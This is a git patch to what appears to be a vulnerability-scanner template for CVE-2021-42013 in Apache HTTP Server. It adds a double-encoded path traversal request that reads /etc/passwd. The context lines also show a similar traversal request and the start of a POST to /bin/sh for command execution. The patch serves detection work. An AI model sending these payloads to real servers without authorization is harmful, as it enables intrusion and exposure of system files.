From e0e25d7b2b1223aedd6e29bddfb4cb57356a2c12 Mon Sep 17 00:00:00 2001
From: 0xshri <35065078+0xshri@users.noreply.github.com>
Date: Thu, 18 Aug 2022 20:32:09 +0530
Subject: [PATCH] feature: Adding additional path for LFI detection (#5158)

---
 cves/2021/CVE-2021-42013.yaml | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml
index 7e16aca764..c98aab3302 100644
--- a/cves/2021/CVE-2021-42013.yaml
+++ b/cves/2021/CVE-2021-42013.yaml
@@ -25,6 +25,11 @@ requests:
         GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
+      
+      - |+
+        GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
 
       - |+
         POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1